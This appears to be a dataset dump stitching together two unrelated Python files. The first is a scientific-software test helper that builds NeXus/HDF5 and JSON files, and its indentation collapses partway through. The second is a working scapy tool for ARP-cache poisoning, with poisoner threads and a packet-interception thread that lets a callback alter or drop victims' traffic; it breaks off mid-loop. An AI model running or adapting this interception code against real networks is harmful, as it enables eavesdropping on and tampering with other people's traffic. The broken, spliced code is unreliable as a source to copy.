| 2,720 | 1,283 |
from dataclasses import dataclass
from typing import List, Union, Iterator, Optional, Dict, Any, Tuple
import h5py
import numpy as np
from enum import Enum
from contextlib import contextmanager
import json
from scippneutron.file_loading._json_nexus import LoadFromJson, MissingDataset
h5root = Union[h5py.File, h5py.Group]
def _create_nx_class(group_name: str, nx_class_name: str, parent: h5root) -> h5py.Group:
    """Create a child group of *parent* tagged with the given NX_class attribute."""
    group = parent.create_group(group_name)
    group.attrs["NX_class"] = nx_class_name
    return group
@contextmanager
def in_memory_hdf5_file_with_two_nxentry() -> Iterator[h5py.File]:
    """Yield a purely in-memory HDF5 file containing two empty NXentry groups."""
    # "core" driver + backing_store=False keeps the file in memory only;
    # nothing is written to disk on flush or close.
    nexus_file = h5py.File('in_memory_events.nxs',
                           mode='w',
                           driver="core",
                           backing_store=False)
    try:
        _create_nx_class("entry_1", "NXentry", nexus_file)
        _create_nx_class("entry_2", "NXentry", nexus_file)
        yield nexus_file
    finally:
        nexus_file.close()
@dataclass
class EventData:
    """Test double describing an NXevent_data group; None fields are omitted."""
    event_id: Optional[np.ndarray]
    event_time_offset: Optional[np.ndarray]
    event_time_zero: Optional[np.ndarray]
    event_index: Optional[np.ndarray]
    # Defaults follow the conventions the loaders under test expect.
    event_time_zero_unit: Optional[Union[str, bytes]] = "ns"
    event_time_zero_offset: Optional[Union[str, bytes]] = "1970-01-01T00:00:00Z"
    event_time_offset_unit: Optional[Union[str, bytes]] = "ns"
@dataclass
class Log:
    """Test double describing an NXlog group (a named, optionally timed series)."""
    name: str
    value: Optional[np.ndarray]
    time: Optional[np.ndarray] = None
    value_units: Optional[Union[str, bytes]] = None
    # From
    # https://manual.nexusformat.org/classes/base_classes/NXlog.html?highlight=nxlog
    # time units are non-optional if time series data is present, and the unit
    # must be a unit of time (i.e. convertible to seconds).
    time_units: Optional[Union[str, bytes]] = "s"
    start_time: Optional[Union[str, bytes]] = None
    scaling_factor: Optional[float] = None
class TransformationType(Enum):
    """The two geometric transformation kinds used in depends_on chains."""
    TRANSLATION = "translation"
    ROTATION = "rotation"
@dataclass
class Transformation:
    """One entry of a NeXus depends_on transformation chain."""
    transform_type: TransformationType
    # Direction of translation / axis of rotation.
    vector: np.ndarray
    value: Optional[np.ndarray]
    time: Optional[np.ndarray] = None
    # Next transformation in the chain; may also be a path string.
    depends_on: Union["Transformation", str, None] = None
    offset: Optional[np.ndarray] = None
    value_units: Optional[Union[str, bytes]] = None
    time_units: Optional[Union[str, bytes]] = None
@dataclass
class Detector:
    """Test double describing a detector component; unset fields are omitted."""
    detector_numbers: Optional[np.ndarray] = None
    event_data: Optional[EventData] = None
    log: Optional[Log] = None
    x_offsets: Optional[np.ndarray] = None
    y_offsets: Optional[np.ndarray] = None
    z_offsets: Optional[np.ndarray] = None
    offsets_unit: Optional[Union[str, bytes]] = None
    depends_on: Optional[Transformation] = None
@dataclass
class Sample:
    """Test double describing a sample component."""
    name: str
    depends_on: Optional[Transformation] = None
    distance: Optional[float] = None
    distance_units: Optional[Union[str, bytes]] = None
    ub_matrix: Optional[np.ndarray] = None
    orientation_matrix: Optional[np.ndarray] = None
@dataclass
class Source:
    """Test double describing a source component."""
    name: str
    # Unlike Sample, a bare path string is also accepted here.
    depends_on: Union[Transformation, None, str] = None
    distance: Optional[float] = None
    distance_units: Optional[Union[str, bytes]] = None
@dataclass
class Chopper:
    """Test double describing a chopper (position and rotation speed)."""
    name: str
    distance: float
    rotation_speed: float
    distance_units: Optional[str] = None
    rotation_units: Optional[str] = None
@dataclass
class Link:
    """A link to be created at new_path, pointing at target_path."""
    new_path: str
    target_path: str
@dataclass
class DatasetAtPath:
    """A dataset (plus attributes) to be written at an absolute path."""
    path: str
    data: np.ndarray
    attributes: Dict[str, Any]
@dataclass
class Stream:
    """
    Only present in the JSON NeXus file templates, not in HDF5 NeXus files.
    Records where to find data in Kafka that are streamed during an experiment.
    The defaults describe a typical f142 motion-device stream.
    """
    # Where the builder should place the stream object
    path: str
    # The following members correspond to fields in stream object.
    # Some of them may not be of interest to Scipp but are to other
    # software which consume the json template, for example
    # the Filewriter (https://github.com/ess-dmsc/kafka-to-nexus)
    # Kafka topic (named data stream)
    topic: str = "motion_devices_topic"
    # Source name, allows filtering and multiplexing to different
    # writer_modules by the filewriter software
    source: str = "linear_axis"
    # Tells filewriter which plugin to use to deserialise
    # messages in this stream and how to write the data to file.
    # For example the "f142" writer module deserialises messages which
    # were serialised with the "f142" flatbuffer schema
    # (https://github.com/ess-dmsc/streaming-data-types/) and
    # writes resulting timeseries data to file as an NXlog
    # (https://manual.nexusformat.org/classes/base_classes/NXlog.html)
    writer_module: str = "f142"
    # Deserialised values are expected to be of this type
    type: str = "double"
    # Values have these units
    value_units: str = "m"
@dataclass
class Monitor:
    """Test double describing a monitor: data values plus named axes."""
    name: str
    data: np.ndarray
    # One (axis name, coordinate values) pair per data dimension.
    axes: List[Tuple[str, np.ndarray]]
    events: Optional[EventData] = None
class InMemoryNeXusWriter:
    """Writer backend producing NeXus structure in an h5py file object."""
    def add_dataset_at_path(self, file_root: h5py.File, path: str, data: np.ndarray,
                            attributes: Dict):
        """Create a dataset at the absolute *path* and set its attributes."""
        path_split = path.split("/")
        dataset_name = path_split[-1]
        parent_path = "/".join(path_split[:-1])
        dataset = self.add_dataset(file_root[parent_path], dataset_name, data)
        for name, value in attributes.items():
            self.add_attribute(dataset, name, value)
    @staticmethod
    def add_dataset(parent: h5py.Group, name: str,
                    data: Union[str, bytes, np.ndarray]) -> h5py.Dataset:
        """Create and return a child dataset holding *data*."""
        return parent.create_dataset(name, data=data)
    @staticmethod
    def add_attribute(parent: Union[h5py.Group, h5py.Dataset], name: str,
                      value: Union[str, bytes, np.ndarray]):
        """Set an HDF5 attribute on a group or dataset."""
        parent.attrs[name] = value
    @staticmethod
    def add_group(parent: h5py.Group, name: str) -> h5py.Group:
        """Create and return a child group."""
        return parent.create_group(name)
    @staticmethod
    def add_hard_link(file_root: h5py.File, new_path: str, target_path: str):
        """Hard-link new_path to the object at target_path, first deleting
        any existing object at new_path."""
        try:
            _ = file_root[new_path]
            del file_root[new_path]
        except KeyError:
            pass
        file_root[new_path] = file_root[target_path]
    @staticmethod
    def add_soft_link(file_root: h5py.File, new_path: str, target_path: str):
        """Soft-link new_path to target_path, first deleting any existing
        object at new_path."""
        try:
            _ = file_root[new_path]
            del file_root[new_path]
        except KeyError:
            pass
        file_root[new_path] = h5py.SoftLink(target_path)
# Maps NumPy scalar types to the type-name strings used in filewriter
# JSON templates (see JsonWriter below).
numpy_to_filewriter_type = {
    np.float32: "float32",
    np.float64: "float64",
    np.int8: "int8",
    np.int16: "int16",
    np.int32: "int32",
    np.int64: "int64",
    np.uint8: "uint8",
    np.uint16: "uint16",
    np.uint32: "uint32",
    np.uint64: "uint64"
}
def _add_link_to_json(file_root: Dict, new_path: str, target_path: str):
    """Insert a filewriter-style link node at *new_path*, replacing any
    existing child of the same name."""
    *parent_parts, link_name = new_path.split("/")
    parent_path = "/".join(parent_parts)
    nexus = LoadFromJson(file_root)
    parent_group = nexus.get_object_by_path(file_root, parent_path)
    existing_object = nexus.get_child_from_group(parent_group, link_name)
    if existing_object is not None:
        parent_group["children"].remove(existing_object)
    parent_group["children"].append(
        {"type": "link", "name": link_name, "target": target_path})
def _parent_and_name_from_path(file_root: Dict, path: str) -> Tuple[Dict, str]:
    """Split *path* into (parent group object, final component name)."""
    *parent_parts, name = path.split("/")
    parent_path = "/".join(parent_parts)
    nexus = LoadFromJson(file_root)
    parent_group = nexus.get_object_by_path(file_root, parent_path)
    return parent_group, name
class JsonWriter:
    """Writer backend producing filewriter-style JSON template nodes
    (dicts with "type"/"name"/"children"/"attributes" keys)."""
    def add_dataset_at_path(self, file_root: Dict, path: str, data: np.ndarray,
                            attributes: Dict):
        """Create a dataset node at the absolute *path* and set its attributes."""
        parent_group, dataset_name = _parent_and_name_from_path(file_root, path)
        dataset = self.add_dataset(parent_group, dataset_name, data)
        for name, value in attributes.items():
            self.add_attribute(dataset, name, value)
    @staticmethod
    def add_dataset(parent: Dict, name: str, data: Union[str, bytes,
                                                         np.ndarray]) -> Dict:
        """Append a dataset node under *parent* and return it.

        The "dataset" info block records size/type metadata the filewriter
        expects; scalar floats/ints are also accepted despite the annotation.
        """
        if isinstance(data, (str, bytes)):
            dataset_info = {"string_size": len(data), "type": "string"}
        elif isinstance(data, float):
            dataset_info = {"size": 1, "type": "float64"}
        elif isinstance(data, int):
            dataset_info = {"size": 1, "type": "int32"}
        else:
            dataset_info = {
                "size": data.shape,
                "type": numpy_to_filewriter_type[data.dtype.type]
            }
        new_dataset = {
            "type": "dataset",
            "name": name,
            "values": data,
            "dataset": dataset_info,
            "attributes": []
        }
        parent["children"].append(new_dataset)
        return new_dataset
    @staticmethod
    def add_attribute(parent: Dict, name: str, value: Union[str, bytes, np.ndarray]):
        """Append an attribute entry (with size/type metadata) to *parent*.

        NOTE(review): scalar ints are typed "int64" here but "int32" in
        add_dataset — presumably intentional, worth confirming.
        """
        if isinstance(value, (str, bytes)):
            attr_info = {"string_size": len(value), "type": "string"}
        elif isinstance(value, float):
            attr_info = {"size": 1, "type": "float64"}
        elif isinstance(value, int):
            attr_info = {"size": 1, "type": "int64"}
        else:
            attr_info = {
                "size": value.shape,
                "type": numpy_to_filewriter_type[value.dtype.type]
            }
        name_and_value = {"name": name, "values": value}
        parent["attributes"].append({**attr_info, **name_and_value})
    @staticmethod
    def add_group(parent: Dict, name: str) -> Dict:
        """Append an empty group node under *parent* and return it."""
        new_group = {"type": "group", "name": name, "children": [], "attributes": []}
        parent["children"].append(new_group)
        return new_group
    @staticmethod
    def add_hard_link(file_root: Dict, new_path: str, target_path: str):
        """Add a link node; JSON templates have a single link flavour."""
        _add_link_to_json(file_root, new_path, target_path)
    @staticmethod
    def add_soft_link(file_root: Dict, new_path: str, target_path: str):
        """Add a link node; identical to add_hard_link for JSON output."""
        _add_link_to_json(file_root, new_path, target_path)
    def add_stream(self, file_root: Dict, stream: Stream):
        """Append a stream node at stream.path, creating the parent group
        when the path does not exist yet."""
        new_stream = {
            "type": "stream",
            "stream": {
                "topic": stream.topic,
                "source": stream.source,
                "writer_module": stream.writer_module,
                "type": stream.type,
                "value_units": stream.value_units
            }
        }
        nexus = LoadFromJson(file_root)
        try:
            group = nexus.get_object_by_path(file_root, stream.path)
        except MissingDataset:
            parent, name = _parent_and_name_from_path(file_root, stream.path)
            group = self.add_group(parent, name)
        group["children"].append(new_stream)
class NumpyEncoder(json.JSONEncoder):
    """JSON encoder that serialises NumPy arrays as (nested) lists."""
    def default(self, obj):
        if not isinstance(obj, np.ndarray):
            # Defer to the base class for everything else (raises TypeError).
            return json.JSONEncoder.default(self, obj)
        return obj.tolist()
class NexusBuilder:
"""
Allows building an in-memory NeXus file for use in tests
"""
    def __init__(self):
        """Start with an empty builder; content is registered via add_*."""
        self._event_data: List[EventData] = []
        self._detectors: List[Detector] = []
        self._logs: List[Log] = []
        self._instrument_name: Optional[str] = None
        self._choppers: List[Chopper] = []
        self._title: Optional[str] = None
        self._start_time: Optional[str] = None
        self._end_time: Optional[str] = None
        self._sample: List[Sample] = []
        self._source: List[Source] = []
        self._hard_links: List[Link] = []
        self._soft_links: List[Link] = []
        # Chosen lazily: InMemoryNeXusWriter for HDF5, JsonWriter for JSON.
        self._writer = None
        self._datasets: List[DatasetAtPath] = []
        self._streams = []
        self._monitors = []
    def add_dataset_at_path(self, path: str, data: np.ndarray, attributes: Dict):
        """Queue a dataset (with attributes) to be written at an absolute path."""
        self._datasets.append(DatasetAtPath(path, data, attributes))
    def _write_datasets(self, root: Union[Dict, h5py.File]):
        """Write all queued datasets through the active writer backend."""
        for dataset in self._datasets:
            self._writer.add_dataset_at_path(root, dataset.path, dataset.data,
                                             dataset.attributes)
    def add_stream(self, stream: Stream):
        """Register a Kafka stream placeholder (JSON output only)."""
        self._streams.append(stream)
    def add_detector(self, detector: Detector):
        """Register a detector component."""
        self._detectors.append(detector)
    def add_event_data(self, event_data: EventData):
        """Register a top-level event-data group."""
        self._event_data.append(event_data)
    def add_log(self, log: Log):
        """Register a log (time-series) group."""
        self._logs.append(log)
    def add_instrument(self, name: str):
        """Set the instrument name."""
        self._instrument_name = name
    def add_chopper(self, chopper: Chopper):
        """Register a chopper component."""
        self._choppers.append(chopper)
    def add_title(self, title: str):
        """Set the experiment title."""
        self._title = title
    def add_run_start_time(self, start_time: str):
        """Set the run start timestamp."""
        self._start_time = start_time
    def add_run_end_time(self, end_time: str):
        """Set the run end timestamp."""
        self._end_time = end_time
    def add_sample(self, sample: Sample):
        """Register a sample component."""
        self._sample.append(sample)
    def add_source(self, source: Source):
        """Register a source component."""
        self._source.append(source)
def add_hard_link(self, link: Link):
"""
If there is a group or dataset at the link path it will
be replaced by the link
"""
self._hard_links.append(link)
def add_soft_link(self, link: Link):
"""
If there is a group or dataset at the link path it will
be replaced by the link
"""
self._soft_links.append(link)
def add_component(self, component: Union[Sample, Source]):
# This is a little ugly, but allows parametrisation
# of tests which should work for sample and source
if isinstance(component, Sample):
self.add_sample(component)
elif isinstance(component, Source):
self.add_source(component)
def add_monitor(self, monitor: Monitor):
self._monitors.append(monitor)
@property
def json_string(self):
self._writer = JsonWriter()
root = {"children": []}
self._write_file(root)
return json.dumps(root, indent=4, cls=NumpyEncoder)
def create_json_file(self):
"""
Create a file on disk, do not use this in tests, it is intended to
be used as a tool during test development
"""
self._writer = JsonWriter()
root = {"children": []}
self._write_file(root)
with open("test_json.txt", "w") as json_file:
return json.dump(root, json_file, indent=4, cls=NumpyEncoder)
@contextmanager
def file(self) -> Iterator[h5py.File]:
# "core" driver means file is "in-memory" not on disk.
# backing_store=False prevents file being written to
# disk on flush() or close().
nexus_file = h5py.File('in_memory_events.nxs',
mode='w',
driver="core",
backing_store=False)
self._writer = InMemoryNeXusWriter()
try:
self._write_file(nexus_file)
yield nexus_file
finally:
nexus_file.close()
def _write_file(self, nexus_file: Union[h5py.File, Dict]):
entry_group = self._create_nx_class("entry", "NXentry", nexus_file)
if self._title is not None:
self._writer.add_dataset(entry_group, "title", data=self._title)
if self._start_time is not None:
self._writer.add_dataset(entry_group, "start_time", data=self._start_time)
if self._end_time is not None:
self._writer.add_dataset(entry_group, "end_time", data=self._end_time)
self._write_event_data(entry_group)
self._write_logs(entry_group)
self._write_sample(entry_group)
self._write_source(entry_group)
if self._instrument_name is None:
parent_group = entry_group
parent_path = "/entry"
else:
parent_group = self._write_instrument(entry_group)
parent_path = "/entry/instrument"
self._write_choppers(parent_group)
self._write_detectors(parent_group, parent_path)
self._write_datasets(nexus_file)
self._write_streams(nexus_file)
self._write_links(nexus_file)
self._write_monitors(nexus_file)
def create_file_on_disk(self, filename: str):
"""
Create a file on disk, do not use this in tests, it is intended to
be used as a tool during test development. Output file can be
explored using a tool such as HDFView.
"""
nexus_file = h5py.File(filename, mode='w')
self._writer = InMemoryNeXusWriter()
try:
self._write_file(nexus_file)
finally:
nexus_file.close()
def _write_links(self, file_root: Union[h5py.Group, Dict]):
for hard_link in self._hard_links:
self._writer.add_hard_link(file_root, hard_link.new_path,
hard_link.target_path)
for soft_link in self._soft_links:
self._writer.add_soft_link(file_root, soft_link.new_path,
soft_link.target_path)
def _write_sample(self, parent_group: Union[h5py.Group, Dict]):
for sample in self._sample:
sample_group = self._create_nx_class(sample.name, "NXsample", parent_group)
if sample.depends_on is not None:
depends_on = self._add_transformations_to_file(
sample.depends_on, sample_group, f"/entry/{sample.name}")
self._writer.add_dataset(sample_group, "depends_on", data=depends_on)
if sample.distance is not None:
distance_ds = self._writer.add_dataset(sample_group,
"distance",
data=sample.distance)
if sample.distance_units is not None:
self._writer.add_attribute(distance_ds, "units",
sample.distance_units)
if sample.ub_matrix is not None:
self._writer.add_dataset(sample_group,
"ub_matrix",
data=sample.ub_matrix)
if sample.orientation_matrix is not None:
self._writer.add_dataset(sample_group,
"orientation_matrix",
data=sample.orientation_matrix)
def _write_source(self, parent_group: Union[h5py.Group, Dict]):
for source in self._source:
source_group = self._create_nx_class(source.name, "NXsource", parent_group)
if source.depends_on is not None:
if isinstance(source.depends_on, str):
depends_on = source.depends_on
else:
depends_on = self._add_transformations_to_file(
source.depends_on, source_group, f"/entry/{source.name}")
self._writer.add_dataset(source_group, "depends_on", data=depends_on)
if source.distance is not None:
distance_ds = self._writer.add_dataset(source_group,
"distance",
data=source.distance)
if source.distance_units is not None:
self._writer.add_attribute(distance_ds, "units",
source.distance_units)
def _write_instrument(
self, parent_group: Union[h5py.Group, Dict]) -> Union[h5py.Group, Dict]:
instrument_group = self._create_nx_class("instrument", "NXinstrument",
parent_group)
self._writer.add_dataset(instrument_group, "name", self._instrument_name)
return instrument_group
def _write_detectors(self, parent_group: Union[h5py.Group, Dict], parent_path: str):
for detector_index, detector in enumerate(self._detectors):
detector_name = f"detector_{detector_index}"
detector_group = self._add_detector_group_to_file(
detector, parent_group, detector_name)
if detector.event_data is not None:
self._add_event_data_group_to_file(detector.event_data, detector_group,
"events")
if detector.log is not None:
self._add_log_group_to_file(detector.log, detector_group)
if detector.depends_on is not None:
depends_on = self._add_transformations_to_file(
detector.depends_on, detector_group,
f"{parent_path}/{detector_name}")
self._writer.add_dataset(detector_group, "depends_on", data=depends_on)
def _write_choppers(self, parent_group: Union[h5py.Group, Dict]):
for chopper in self._choppers:
chopper_group = self._create_nx_class(chopper.name, "NXdisk_chopper",
parent_group)
distance_ds = self._writer.add_dataset(chopper_group,
"distance",
data=chopper.distance)
rotation_ds = self._writer.add_dataset(chopper_group,
"rotation_speed",
data=chopper.rotation_speed)
if chopper.distance_units is not None:
self._writer.add_attribute(distance_ds, "units", chopper.distance_units)
if chopper.rotation_units is not None:
self._writer.add_attribute(rotation_ds, "units", chopper.rotation_units)
def _write_event_data(self, parent_group: Union[h5py.Group, Dict]):
for event_data_index, event_data in enumerate(self._event_data):
self._add_event_data_group_to_file(event_data, parent_group,
f"events_{event_data_index}")
def _write_monitors(self, parent_group: Union[h5py.Group, Dict]):
for monitor in self._monitors:
self._add_monitor_group_to_file(monitor, parent_group)
def _add_monitor_group_to_file(self, monitor: Monitor, parent_group: h5py.Group):
monitor_group = self._create_nx_class(monitor.name, "NXmonitor", parent_group)
data_group = self._writer.add_dataset(monitor_group, "data", monitor.data)
self._writer.add_attribute(data_group, "axes",
",".join(name for name, _ in monitor.axes))
if monitor.events:
self._write_event_data_to_group(monitor_group, monitor.events)
for axis_name, axis_data in monitor.axes:
# We write event data (if exists) first - if we've already written event
# data the event index will already have been created so we skip writing
# it here.
if not monitor.events or not axis_name == "event_index":
self._writer.add_dataset(monitor_group, axis_name, axis_data)
def _write_logs(self, parent_group: Union[h5py.Group, Dict]):
for log in self._logs:
self._add_log_group_to_file(log, parent_group)
def _add_event_data_group_to_file(self, data: EventData, parent_group: h5py.Group,
group_name: str):
event_group = self._create_nx_class(group_name, "NXevent_data", parent_group)
self._write_event_data_to_group(event_group, data)
def _write_event_data_to_group(self, event_group: h5py.Group, data: EventData):
if data.event_id is not None:
self._writer.add_dataset(event_group, "event_id", data=data.event_id)
if data.event_time_offset is not None:
event_time_offset_ds = self._writer.add_dataset(event_group,
"event_time_offset",
data=data.event_time_offset)
self._writer.add_attribute(event_time_offset_ds, "units",
data.event_time_offset_unit)
if data.event_time_zero is not None:
event_time_zero_ds = self._writer.add_dataset(event_group,
"event_time_zero",
data=data.event_time_zero)
self._writer.add_attribute(event_time_zero_ds, "units",
data.event_time_zero_unit)
self._writer.add_attribute(event_time_zero_ds, "offset",
data.event_time_zero_offset)
if data.event_index is not None:
self._writer.add_dataset(event_group, "event_index", data=data.event_index)
def _add_transformations_to_file(self, transform: Transformation,
parent_group: h5py.Group, parent_path: str) -> str:
transform_chain = [transform]
while transform.depends_on is not None and not isinstance(
transform.depends_on, str):
transform_chain.append(transform.depends_on)
transform = transform.depends_on
transforms_group_name = "transformations"
transforms_group = self._create_nx_class("transformations", "NXtransformations",
parent_group)
transform_chain.reverse()
depends_on_str = transform.depends_on if isinstance(transform.depends_on,
str) else None
transform_group_path = f"{parent_path}/{transforms_group_name}"
for transform_number, transform in enumerate(transform_chain):
if transform.time is not None:
depends_on_str = self._add_transformation_as_log(
transform, transform_number, transforms_group, transform_group_path,
depends_on_str)
else:
depends_on_str = self._add_transformation_as_dataset(
transform, transform_number, transforms_group, transform_group_path,
depends_on_str)
return depends_on_str
def _add_transformation_as_dataset(self, transform: Transformation,
transform_number: int,
transforms_group: h5py.Group, group_path: str,
depends_on: Optional[str]) -> str:
transform_name = f"transform_{transform_number}"
added_transform = self._writer.add_dataset(transforms_group,
f"transform_{transform_number}",
data=transform.value)
self._add_transform_attributes(added_transform, depends_on, transform)
if transform.value_units is not None:
self._writer.add_attribute(added_transform, "units", transform.value_units)
return f"{group_path}/{transform_name}"
def _add_log_group_to_file(self, log: Log, parent_group: h5py.Group) -> h5py.Group:
log_group = self._create_nx_class(log.name, "NXlog", parent_group)
if log.value is not None:
value_ds = self._writer.add_dataset(log_group, "value", log.value)
if log.value_units is not None:
self._writer.add_attribute(value_ds, "units", log.value_units)
if log.time is not None:
time_ds = self._writer.add_dataset(log_group, "time", data=log.time)
if log.time_units is not None:
self._writer.add_attribute(time_ds, "units", log.time_units)
if log.start_time is not None:
self._writer.add_attribute(time_ds, "start", log.start_time)
if log.scaling_factor is not None:
self._writer.add_attribute(time_ds, "scaling_factor",
log.scaling_factor)
return log_group
def _add_transformation_as_log(self, transform: Transformation,
transform_number: int, transforms_group: h5py.Group,
group_path: str, depends_on: Optional[str]) -> str:
transform_name = f"transform_{transform_number}"
added_transform = self._add_log_group_to_file(
Log(transform_name, transform.value, transform.time, transform.value_units,
transform.time_units), transforms_group)
self._add_transform_attributes(added_transform, depends_on, transform)
return f"{group_path}/{transform_name}"
def _add_detector_group_to_file(self, detector: Detector, parent_group: h5py.Group,
group_name: str) -> h5py.Group:
detector_group = self._create_nx_class(group_name, "NXdetector", parent_group)
if detector.detector_numbers is not None:
self._writer.add_dataset(detector_group, "detector_number",
detector.detector_numbers)
for dataset_name, array in (("x_pixel_offset", detector.x_offsets),
("y_pixel_offset", detector.y_offsets),
("z_pixel_offset", detector.z_offsets)):
if array is not None:
offsets_ds = self._writer.add_dataset(detector_group, dataset_name,
array)
if detector.offsets_unit is not None:
self._writer.add_attribute(offsets_ds, "units",
detector.offsets_unit)
return detector_group
def _add_transform_attributes(self, added_transform: Union[h5py.Group,
h5py.Dataset],
depends_on: Optional[str], transform: Transformation):
self._writer.add_attribute(added_transform, "vector", transform.vector)
self._writer.add_attribute(added_transform, "transformation_type",
transform.transform_type.value)
if transform.offset is not None:
self._writer.add_attribute(added_transform, "offset", transform.offset)
if depends_on is not None:
self._writer.add_attribute(added_transform, "depends_on", depends_on)
else:
self._writer.add_attribute(added_transform, "depends_on",
".") # means end of chain
def _create_nx_class(self, group_name: str, nx_class_name: str,
parent: h5root) -> h5py.Group:
nx_class = self._writer.add_group(parent, group_name)
self._writer.add_attribute(nx_class, "NX_class", nx_class_name)
return nx_class
def _write_streams(self, root: Union[h5py.File, Dict]):
if isinstance(self._writer, JsonWriter):
for stream in self._streams:
self._writer.add_stream(root, stream)
| 31,414 | 9,270 |
"""
MIT License
Copyright (c) 2018 Jacob Hartman
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import sys
import threading
import time
import copy
from scapy.all import *
import ipaddress
def is_python_2():
    """Return True when running under a Python 2 interpreter."""
    return sys.version_info.major == 2
if is_python_2():
import Queue as queue
else:
import queue
class SniffThread (threading.Thread):
    """Daemon thread that sniffs frames on an interface and pushes each
    captured packet onto the supplied queue.

    Stop it cooperatively with stop_sniffing(); scapy's sniff() checks
    is_stopping() for every packet and returns once it is True.
    """
    def __init__(self, interface, out_queue, filter=""):
        threading.Thread.__init__(self)
        self._queue = out_queue        # consumer-owned queue of raw packets
        self._filter = filter          # BPF capture filter string
        self._interface = interface
        self.daemon = True
        # BUG FIX: this flag was named "_stop", which shadows the internal
        # threading.Thread._stop() *method* in Python 3; when the thread
        # terminated, Thread's cleanup called self._stop() and raised
        # "TypeError: 'bool' object is not callable".
        self._stop_requested = False
    def sniff(self, pkt):
        """Per-packet callback for scapy's sniff(): enqueue the packet."""
        self._queue.put(pkt)
    def is_stopping(self, pkt):
        """stop_filter callback for scapy's sniff(): True once asked to stop."""
        return self._stop_requested
    def run(self):
        # Blocks until stop_sniffing() is called (checked per packet).
        sniff(prn=self.sniff, store=0, iface=self._interface, filter=self._filter, stop_filter=self.is_stopping)
        print("done")
    def stop_sniffing(self):
        """Request that the capture loop terminate after the next packet."""
        self._stop_requested = True
class ArpRequestPoisoner(threading.Thread):
    """Daemon thread that poisons victims' ARP caches using broadcast ARP
    *requests*, then restores (re-arps) them once stopped."""
    def __init__(self, mac, interface, ip_map, free_ip, incr=2):
        threading.Thread.__init__(self)
        self.daemon = True
        self._mac = mac                # our MAC, advertised while poisoning
        self._interface = interface
        self._ip_map = ip_map          # victim IP -> real MAC
        self._incr = incr              # seconds between rounds
        self._running = True
        self._free_ip = free_ip        # unused IP used as the request target
    def stop_poison(self):
        """Ask run() to leave the poisoning loop and re-arp the victims."""
        self._running = False
    def _broadcast_request(self, src_mac, sender_ip, target_ip):
        # One broadcast ARP who-has frame claiming src_mac owns sender_ip.
        frame = Ether(dst="ff:ff:ff:ff:ff:ff", src=src_mac,
                      type=0x806) / ARP(op=1, hwsrc=src_mac,
                                        pdst=target_ip, psrc=sender_ip)
        sendp(frame, iface=self._interface, verbose=0)
    def run(self):
        # Poison every mapped IP with our MAC until asked to stop.
        while self._running:
            for victim_ip in self._ip_map:
                self._broadcast_request(self._mac, victim_ip, self._free_ip)
            time.sleep(self._incr)
        print("ArpRequestPoisoner stopped, re-arping...")
        # Re-arp pass 1: advertise each victim's true MAC for its own IP.
        for _ in range(3):
            for victim_ip in self._ip_map:
                self._broadcast_request(self._ip_map[victim_ip], victim_ip,
                                        self._free_ip)
            time.sleep(self._incr)
        # Re-arp pass 2: refresh the free-IP entry addressed at each victim.
        for _ in range(3):
            for victim_ip in self._ip_map:
                self._broadcast_request(self._mac, self._free_ip, victim_ip)
            time.sleep(self._incr)
class ArpResponsePoisoner(threading.Thread):
    """Daemon thread that poisons victims' ARP caches using unicast ARP
    *replies*, then restores (re-arps) them once stopped."""
    def __init__(self, mac, interface, ip_map, incr=2):
        threading.Thread.__init__(self)
        self.daemon = True
        self._mac = mac                # our MAC, advertised while poisoning
        self._interface = interface
        self._ip_map = ip_map          # victim IP -> real MAC
        self._incr = incr              # seconds between rounds
        self._running = True
    def stop_poison(self):
        """Ask run() to leave the poisoning loop and re-arp the victims."""
        self._running = False
    def _send_reply(self, claimed_mac, target_ip, claimed_ip):
        # Unicast ARP is-at frame telling target_ip that claimed_ip is
        # reachable at claimed_mac.
        frame = Ether(dst=self._ip_map[target_ip], src=claimed_mac,
                      type=0x806) / ARP(op=2, pdst=target_ip,
                                        hwdst=self._ip_map[target_ip],
                                        psrc=claimed_ip, hwsrc=claimed_mac)
        sendp(frame, iface=self._interface, verbose=0)
    def run(self):
        # Poison: tell every victim that every mapped IP lives at our MAC.
        while self._running:
            for target_ip in self._ip_map:
                for claimed_ip in self._ip_map:
                    self._send_reply(self._mac, target_ip, claimed_ip)
            time.sleep(self._incr)
        print("ArpResponsePoisoner stopped, re-arping...")
        # Re-arp: replies now carry the true MAC of every mapped IP.
        for _ in range(3):
            for target_ip in self._ip_map:
                for claimed_ip in self._ip_map:
                    self._send_reply(self._ip_map[claimed_ip], target_ip,
                                     claimed_ip)
            time.sleep(self._incr)
class PacketIntercept(threading.Thread):
    """Thread that receives frames redirected to us during the MITM and
    forwards them to their real destination, optionally passing each one
    through a user callback first."""
    def __init__(self, mac_address, ip_address, interface, ip_map, on_packet):
        threading.Thread.__init__(self)
        self._on_packet = on_packet    # optional callable(pkt) -> pkt or falsy
        self._mac = mac_address
        self._interface = interface
        self._ip_map = ip_map          # victim IP -> real MAC
        self._ip = ip_address
        self._running = True
        self._pkt_queue = queue.Queue()
    def stop_processing(self):
        """Stop the forwarding loop; a None sentinel unblocks the queue."""
        self._running = False
        self._pkt_queue.put(None)
    def run(self):
        # Capture everything addressed to our MAC except ARP and our own IP.
        capture = SniffThread(self._interface, self._pkt_queue, "not arp and not host " + str(self._ip) + " and ether host " + self._mac)
        capture.start()
        while self._running:
            frame = self._pkt_queue.get()
            # Skip the stop sentinel and frames not genuinely destined to us.
            if not (frame and Ether in frame
                    and frame.dst == self._mac and frame.src != self._mac):
                continue
            if self._on_packet:
                # Hand the callback its own copy so it can mutate freely.
                outgoing = self._on_packet(copy.deepcopy(frame))
            else:
                outgoing = frame
            # A falsy return from the callback means "drop this packet".
            if not outgoing:
                continue
